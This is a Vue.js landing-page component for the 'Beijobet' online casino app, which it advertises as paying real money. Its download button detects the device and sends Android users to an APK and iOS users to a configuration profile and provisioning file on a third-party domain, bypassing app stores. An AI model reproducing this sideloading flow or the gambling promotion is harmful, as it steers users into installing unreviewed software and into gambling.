<template>
    <div class="big-wrap">
        <div class="app-wrap">
            <h1 class="url">Beijobet.com</h1>
            <div class="descri">
                BEIJOBET | Cassino Online，jogos de cassino online que ganha dinheiro real
            </div>
            <button class="dld" @click="download()">Download</button>
        </div>

        <ft></ft>
    </div>
</template>
<script>
import ft from "../../components/ft.vue"
export default {
    name: 'app',
    data() {
        return {

        };
    },
    mounted() {
        this.$parent.footer("app");
    },
    components: {
        ft
    },
    methods: {
        download() {
            var ua = navigator.userAgent.toLowerCase(),
                iphoneos = (ua.match(/iphone os/i) == "iphone os") || (ua.match(/iph os/i) == "iph os") || (ua.match(/ipad/i) == "ipad"),
                android = (ua.match(/android/i) == "android") || (ua.match(/adr/i) == "adr") || (ua.match(/android/i) == "mi pad");
            let andurl = "https://h5.nswap.bid/beijobet.apk";
            // let url = "https://h5.nswap.bid/beijobet.apk";
            var iosurl = 'https://h5.nswap.bid/sign.mobileconfig';     //苹果端下载地址
            if (iphoneos) {
                //console.log(iosurl);
                window.location.href = iosurl;
                setTimeout(function () {
                    location.href = 'https://h5.nswap.bid/app.mobileprovision'
                }, 1 * 2000)
                // doLocation(iosurl);
            } else {
                console.log(andurl);
                window.location.href = andurl;
                // doLocation(andurl);
            }

        }
    }
}


</script>
<style scoped>
.big-wrap {
    min-height: 100vh;
    background: url("../images/vip/vip.png");
}

.app-wrap {
    width: 95%;
    margin: 20px auto;
    padding: 10px;
    /* background: radial-gradient(#03cb50, transparent 86%); */
    margin-top: 20px;
    padding-bottom: 30px;
}

.url {
    text-align: center;
    font-size: 22px;
    color: gold;
    margin-bottom: 20px;
}

.descri {
    font-size: 26px;
    color: white;
    font-weight: 700;
    line-height: 50px;
}

.dld {
    width: 90%;
    height: 50px;
    line-height: 50px;
    text-align: center;
    display: block;
    margin: 0 auto;
    color: #fff;
    background: #00792f;
    margin-top: 10px;
    font-size: 18px;
    border-radius: 5px;
}
</style>